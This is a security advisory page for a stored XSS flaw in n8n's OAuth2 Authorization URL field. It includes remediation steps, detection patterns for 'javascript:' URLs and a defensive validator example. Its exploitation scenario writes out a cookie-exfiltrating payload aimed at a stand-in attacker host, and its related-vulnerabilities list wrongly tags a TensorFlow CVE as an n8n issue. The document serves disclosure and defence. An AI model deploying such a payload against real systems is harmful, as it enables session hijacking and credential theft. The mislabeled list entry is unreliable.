GHSA-364x-8g5j-x2pr: n8n: stored XSS via malicious OAuth2 Authorization URL
GHSA-364x-8g5j-x2pr (MEDIUM)
Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.
What is the risk?
Nominal CVSS 5.4 (medium) understates real-world risk in AI-heavy environments. n8n instances typically hold credentials for dozens of upstream services—LLM APIs, vector databases, data warehouses—making session takeover disproportionately damaging. Exploitability is trivial once the attacker has any credential-creation permission; no AI/ML knowledge required. Insider threat and credential-sharing abuse patterns are realistic vectors. Organizations with large n8n deployments shared across teams face the highest exposure.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | >= 2.7.0, < 2.8.0 | 2.8.0 |
Do you run n8n in the vulnerable range above? You're affected.
What should I do?
Five steps:
1. PATCH: Upgrade to n8n 2.8.0 or 2.6.4 immediately; these versions sanitize the Authorization URL field.
2. AUDIT: Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials.
3. RESTRICT: Tighten credential creation and sharing permissions to the minimum necessary set of users until patched.
4. DETECT: Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints.
5. SCOPE: Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.
Frequently Asked Questions
Is GHSA-364x-8g5j-x2pr actively exploited?
No confirmed active exploitation of GHSA-364x-8g5j-x2pr has been reported, but organizations should still patch proactively.
How to fix GHSA-364x-8g5j-x2pr?
Follow the five steps under "What should I do?" above: patch, audit, restrict, detect, scope.
What systems are affected by GHSA-364x-8g5j-x2pr?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI automation pipelines, workflow orchestration, LLM API integration layers.
What is the CVSS score for GHSA-364x-8g5j-x2pr?
GHSA-364x-8g5j-x2pr has a CVSS v3.1 base score of 5.4 (MEDIUM).
Technical Details
NVD Description
## Impact
An authenticated user with permission to create and share credentials could craft a malicious OAuth2 credential containing a JavaScript URL in the Authorization URL field. If a victim opened the credential and interacted with the OAuth authorization button, the injected script would execute in their browser session.
## Patches
The issue has been fixed in n8n versions 2.8.0 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability.
## Workarounds
If upgrading is not immediately possible, administrators should consider the following temporary mitigations:
- Limit credential creation and sharing permissions to fully trusted users only.
- Restrict access to the n8n instance to trusted users only.
These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
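The fix in 2.8.0 sanitizes the Authorization URL field, and the AUDIT step above asks you to find stored credentials whose URL uses a script scheme. As an added example, not code from n8n or from this advisory, the JavaScript below shows both halves of that: an allow-list validator for the field and an audit pass over stored credential records. It goes slightly beyond the page's specific case by accepting only https rather than block-listing javascript:, data: and vbscript:. The record shape (`id`, `name`, `type`, `data.authUrl`), the type name `oauth2` and the sample records are assumptions constructed for this example, not n8n's real storage schema.

```javascript
// Added example (not n8n's own code): allow-list validation of the OAuth2
// Authorization URL field, plus an audit pass over stored credential records.
// The record shape {id, name, type, data.authUrl} and the type name "oauth2"
// are assumptions made for this example, not n8n's real storage schema.

// Only https is accepted: a real OAuth2 authorization endpoint is always an
// https URL, so everything else (javascript:, data:, vbscript:, even http:)
// is rejected outright instead of maintaining a block-list of bad schemes.
const ALLOWED_SCHEMES = new Set(["https:"]);

// Returns { ok: true, normalized } or { ok: false, reason }.
// The WHATWG URL parser strips leading/trailing whitespace, removes embedded
// tabs and newlines, and lower-cases the scheme, so obfuscations such as
// "  JaVaScRiPt:" or "java\tscript:" are normalized before the comparison;
// a naive startsWith("javascript:") check on the raw string would miss them.
function validateAuthorizationUrl(value) {
  if (typeof value !== "string" || value.trim() === "") {
    return { ok: false, reason: "empty" };
  }
  let url;
  try {
    url = new URL(value);
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) {
    return { ok: false, reason: `scheme ${url.protocol} not allowed` };
  }
  if (url.hostname === "") {
    return { ok: false, reason: "missing host" };
  }
  return { ok: true, normalized: url.href };
}

// Audit helper for the AUDIT step: walk stored credentials and report every
// OAuth2 record whose Authorization URL fails validation. Records of other
// types are skipped because they have no such field.
function auditCredentials(records) {
  const flagged = [];
  for (const rec of records) {
    if (rec.type !== "oauth2") continue;
    const result = validateAuthorizationUrl(rec.data && rec.data.authUrl);
    if (!result.ok) {
      flagged.push({ id: rec.id, name: rec.name, reason: result.reason });
    }
  }
  return flagged;
}

// Constructed sample records (not real data). c2-c4 use non-https schemes of
// the kind the advisory describes (c3 is case- and whitespace-obfuscated);
// c5 is plain http, which the allow-list also rejects; c6 is not OAuth2.
const SAMPLE_CREDENTIALS = [
  { id: "c1", name: "Slack Integration (Prod)", type: "oauth2",
    data: { authUrl: "https://idp.example/oauth/authorize" } },
  { id: "c2", name: "Slack Integration (Prod)", type: "oauth2",
    data: { authUrl: "javascript:void(0)" } },
  { id: "c3", name: "Analytics", type: "oauth2",
    data: { authUrl: "  JaVaScRiPt:void(0)" } },
  { id: "c4", name: "Docs", type: "oauth2",
    data: { authUrl: "data:text/html,placeholder" } },
  { id: "c5", name: "Legacy IdP", type: "oauth2",
    data: { authUrl: "http://idp.example/authorize" } },
  { id: "c6", name: "Postgres", type: "postgres",
    data: { host: "db.example" } },
];

// Stand-alone run: print the flagged ids and reasons.
if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditCredentials(SAMPLE_CREDENTIALS)) {
    console.log(`${f.id} (${f.name}): ${f.reason}`);
  }
}
```

The same `validateAuthorizationUrl` check is what the DETECT step wants at request time: run it on the Authorization URL of any create or update request to a credential endpoint and alert on a rejection, rather than pattern-matching the raw request body for the string `javascript:`, which the whitespace and case variations above would evade.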
Exploitation Scenario
A disgruntled team member or attacker who has compromised a low-privilege n8n account (e.g., a developer account) creates an OAuth2 credential named something innocuous like 'Slack Integration (Prod)'. In the Authorization URL field they inject: javascript:fetch('https://c2.attacker.io/x?s='+document.cookie). They share this credential with a target admin. The admin, seeing a familiar-looking credential, opens it and clicks the 'Connect' or 'Authorize' button to verify or update it. The injected script executes in the admin's browser session, exfiltrating session cookies to the attacker's C2. The attacker replays the session token, gaining full admin access to n8n and all stored credentials—including OpenAI API keys, database connection strings, and downstream service tokens.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Related Vulnerabilities
- CVE-2026-33663 (10.0): n8n: member role steals plaintext HTTP credentials (same package: n8n)
- CVE-2026-33660 (10.0): TensorFlow: type confusion NPD in tensor conversion (same package: n8n)
- CVE-2026-21858 (10.0): n8n: Input Validation flaw enables exploitation (same package: n8n)
- CVE-2026-27577 (9.9): n8n: Code Injection enables RCE (same package: n8n)
- CVE-2026-27494 (9.9): n8n: security flaw enables exploitation (same package: n8n)